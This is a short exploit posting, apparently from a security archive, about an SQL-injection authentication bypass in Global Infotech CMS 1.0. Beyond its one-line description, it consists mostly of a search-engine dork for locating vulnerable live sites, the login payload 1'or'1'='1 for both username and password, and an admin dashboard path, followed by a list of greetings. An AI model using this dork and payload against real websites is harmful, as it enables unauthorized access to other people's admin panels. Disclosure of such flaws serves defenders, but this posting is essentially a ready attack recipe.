Global Infotech CMS 1.0 SQL Injection

Global Infotech CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


SHA-256 | 6612470f43df2b270a602a475b499cd4ef7b5bc9ae5d659778a7f1d8ac2e8097

====================================================================================================================================
| # Title : Global Infotech cms v 1.0 Auth by pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.globalinfotech.co |
| # Dork : "intext:"Powered by : Global Infotech" |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine

[+] Use Payload = user & pass : 1'or'1'='1

[+] http://127.0.0.1/aaravcscdurgcom/admin/Dashboard.aspx

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
=======================================================================================================================================

Related Posts